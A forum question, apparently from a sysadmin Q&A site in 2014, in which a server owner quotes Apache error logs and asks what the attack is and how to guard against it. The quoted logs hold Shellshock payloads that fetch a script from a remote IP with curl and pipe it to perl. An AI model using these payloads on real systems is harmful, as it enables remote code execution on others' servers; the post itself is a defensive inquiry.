John

Asked: 2014-10-29 02:51:08 +0800 CST2014-10-29 02:51:08 +0800 CST 2014-10-29 02:51:08 +0800 CST

curl error logs not seen before in the apache error logging

Typically my apache error logs get hit with a large volume of the typical 'phpmyadmin' (requests and a huge qty of spelling variations), wordpress admin, joomla and a whole load more.

But last night my server got hit with an unusually high volume of a new type:

[Mon Oct 27 20:22:58 2014] [error] [client 46.105.118.179] File does not exist: /var/www/details.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | perl

And

[Mon Oct 27 20:22:59 2014] [error] [client 46.105.118.179] script not found or unable to stat: /usr/lib/cgi-bin/zml.cgi, referer: () { :; }; curl http://202.143.160.141/lib21/index.cgi | p$

They all are after slight variations of the above two.

Has anyone else seen this? What are they after? Are there any extra security precautions that I might be able to put in place for such attacks?

curl error logs not seen before in the apache error logging

Can you pass user/pass for HTTP Basic Authentication in URL parameters?

Ping a Specific Port

Check if port is open or closed on a Linux server?

How to automate SSH login with password?

How do I tell Git for Windows where to find my private RSA key?

What's the default superuser username/password for postgres after a new install?

What port does SFTP use?

Command line to list users in a Windows Active Directory group?

What is a Pem file and how does it differ from other OpenSSL Generated Key File Formats?

How to determine if a bash variable is empty?

curl error logs not seen before in the apache error logging

0 Answers